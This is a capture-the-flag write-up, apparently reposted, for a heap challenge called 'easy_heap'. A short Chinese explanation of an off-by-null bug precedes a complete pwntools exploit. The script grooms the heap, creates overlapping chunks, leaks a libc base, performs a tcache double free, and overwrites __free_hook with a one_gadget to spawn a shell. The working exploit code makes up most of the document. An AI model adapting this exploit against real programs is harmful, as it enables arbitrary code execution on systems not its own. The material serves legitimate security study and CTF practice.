程序的 malloc(添加 chunk)功能在读入 content 时存在 off-by-null:写满 size 字节后会多写一个 \x00,覆盖到下一个 chunk 的 size 字段最低字节,清掉其 prev_inuse 位。
利用 off-by-null 清除相邻 chunk 的 prev_inuse 位,使其被 free 时向前合并,造成 chunk overlapping;随后 show 重叠区域内已进入 unsorted bin 的 chunk,读出残留的 bin 指针,减去该 libc 版本对应的偏移(脚本中为 0x3ebca0)即得 libc 基址。注意该偏移和 one_gadget 偏移都与所给 libc 版本强绑定,换 libc 必须重新计算。
利用重叠的两个索引对同一块内存 double free(旧版 tcache 不检查 double free),实现 tcache dup,把 tcache 链表指针改为 __free_hook,再次申请即可把 __free_hook 改写为 one_gadget;之后任意一次 free 即触发 one_gadget 获得 shell(one_gadget 的约束条件需满足,不满足时换用其他偏移)。
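from pwn import *

# Target binary and the libc that was shipped with the challenge.
# LD_PRELOAD only swaps the C library; the system's ld.so is still used, so a
# libc that does not match the host loader can crash before main(). Patching the
# binary's interpreter to a matching ld.so (patchelf) is the more reliable setup.
BINARY = './easy_heap'
LIBC_PATH = './libc64.so'

# Distance from libc base to the bin pointer leaked out of the overlapped chunk
# (main_arena+96 in the libc build used by the author). Tied to that exact
# build: recompute it for any other libc or the leak-derived base is garbage.
LIBC_LEAK_OFFSET = 0x3ebca0
# one_gadget offset for the same libc build; its register/stack constraints are
# not checked here, so try another candidate if the final free() only crashes.
ONE_GADGET_OFFSET = 0x4f322

#p = process(BINARY)
p = process([BINARY], env={"LD_PRELOAD": LIBC_PATH})
context.log_level = 'debug'
libc = ELF(LIBC_PATH)


def add(size, cont):
    """Menu 1: allocate a chunk and send *cont* as its content.

    *size* looks like the content length rather than the chunk size (the
    0xf8-byte write below is what triggers the off-by-null) -- confirm against
    the binary.
    """
    p.sendlineafter('> ', '1')
    p.sendlineafter('> ', str(size))
    p.sendlineafter('> ', cont)


def free(index):
    """Menu 2: free the chunk at *index*."""
    p.sendlineafter('> ', '2')
    # NOTE(review): the original waits for '>' (no trailing space) only here;
    # kept as-is in case the index prompt differs from the other prompts.
    p.sendlineafter('>', str(index))


def show(index):
    """Menu 3: print the content of the chunk at *index*."""
    p.sendlineafter('> ', '3')
    p.sendlineafter('> ', str(index))


def exit_prog():
    """Menu 4: leave the program. (Renamed: `exit` shadowed the builtin.)"""
    p.sendlineafter('> ', '4')


def add0():
    """Menu 1 with size 0: allocate a chunk without sending any content."""
    p.sendlineafter('> ', '1')
    p.sendlineafter('> ', '0')


def fill_tcache(start, end):
    """Free chunks start..end-1 in order (the author's way to fill a tcache bin)."""
    for i in range(start, end):
        free(i)


def rm_tcache(num):
    """Allocate *num* empty chunks (the author's way to drain a tcache bin)."""
    for _ in range(num):
        add0()


def groom_heap():
    """Shape the heap so that chunk 7 overlaps a freed chunk holding libc pointers.

    The step comments are the original author's notes on the bin state; they
    are not verified here.
    """
    for _ in range(10):
        add0()
    # fill tcache
    fill_tcache(3, 10)
    free(0)
    free(1)
    free(2)
    # add chunk0-6
    rm_tcache(7)
    add(0x2, '7')
    add(0x2, '8')
    add(0x2, '9')
    # tcache full
    free(8)  # last tcache bin slot
    fill_tcache(0, 6)
    # unsorted bin
    free(7)
    # only chunk 8 left in tcache
    rm_tcache(6)
    # set chunk9 prev_inuse = 0: 0xf8 bytes of content plus the off-by-null
    # lands on the low byte of the next chunk's size field
    add(0xf8, '8')
    fill_tcache(0, 7)
    # trigger overlap
    free(9)
    #gdb.attach(p)
    rm_tcache(7)
    add(0x1, 'a')


def leak_libc():
    """Read a libc pointer out of the overlapped chunk 7 and return the libc base."""
    show(7)
    # First 0x7f-terminated pointer in the output: keep its 6 low bytes and pad
    # to 8. Bytes literals keep this working on Python 3 (str.ljust would raise).
    leaked = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    libc_base = leaked - LIBC_LEAK_OFFSET
    # A libc base is page aligned; anything else means the leak or the offset is
    # wrong for this build. log.error raises and stops the script.
    if libc_base & 0xfff:
        log.error('libc_base=>' + hex(libc_base) + ' is not page aligned; check LIBC_LEAK_OFFSET')
    log.success('libc_base=>' + hex(libc_base))
    return libc_base


def hijack_free_hook(libc_base):
    """tcache dup via the overlapping indices; write one_gadget into __free_hook."""
    one = libc_base + ONE_GADGET_OFFSET
    free_hook = libc_base + libc.sym['__free_hook']
    log.success('one=>' + hex(one))
    log.success('free_hook=>' + hex(free_hook))
    add(0x2, 'c')
    #gdb.attach(p)
    # indices 7 and 9 presumably refer to the same memory after the overlap, so
    # freeing both queues one chunk twice in tcache (no double-free check here)
    free(7)
    free(9)
    # taking the chunk back once lets us rewrite its tcache next pointer
    add(0x10, p64(free_hook))
    fill_tcache(0, 7)
    rm_tcache(7)
    # the poisoned entry now hands out __free_hook itself
    add(0x10, p64(one))


groom_heap()
libc_base = leak_libc()
hijack_free_hook(libc_base)
# any free() now runs the one_gadget through __free_hook
free(0)
#gdb.attach(p)
p.interactive()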
转载地址:http://stugf.baihongyu.com/